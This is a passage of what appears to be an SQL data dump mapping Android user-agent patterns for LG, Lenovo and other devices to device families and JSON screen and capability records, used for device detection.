Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LGMS631) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LGUS110) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LGUS375) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LGUS610) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LGUS991) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LGV32) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LINK55) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LINX A420 3G LS4019PG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LIVE4_KM0438) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LIVE4_KM0439) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LMCV1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LOGIC X5F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LS-4505) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LS-5016) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LT C1300) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LTE_LIMA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LT_C4000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; LUNA_II) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Le2 X527) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo A2016a40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo A2016b30) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo A2016b31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo A6000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo A6020l36) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo A6600a40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo A6600d40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo A7000-a) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo A7010a48) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo A7020a40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo A7020a48) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo A7700) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo K10a40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo K10e70) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo K3 Note) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo K33a42) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo K33a48) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo K33b36) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo K33b37) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo K50-t3s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo K50-t5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo K50a40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo K52e78) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo K53a48) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo K53b36) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo P1a41) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo P1a42) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo P1c58) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo P1c72) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo P2a42) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo PB1-750M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo PB2-650M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo PB2-650Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo PB2-670M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":2.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo PB2-670Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":2.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo PB2-690M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo PB2-690Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":853,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo S1a40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo TAB 2 A10-70F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo TAB 2 A10-70L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo TB-7703X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo TB-8703F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo TB-X103F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo TB2-X30F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo TB2-X30L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo TB3-730X) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo TB3-850F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo TB3-850M) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo TB3-X70F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo TB3-X70L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo X3a40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo YT-X703F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo YT-X703L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo YT3-850F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo YT3-850M) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo YT3-X50F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":900,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo YT3-X50L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo YT3-X50M) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo YT3-X90F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo YT3-X90L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo Z90-7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo Z90a40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Lenovo-A6020l36) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Leto Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Letv X500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 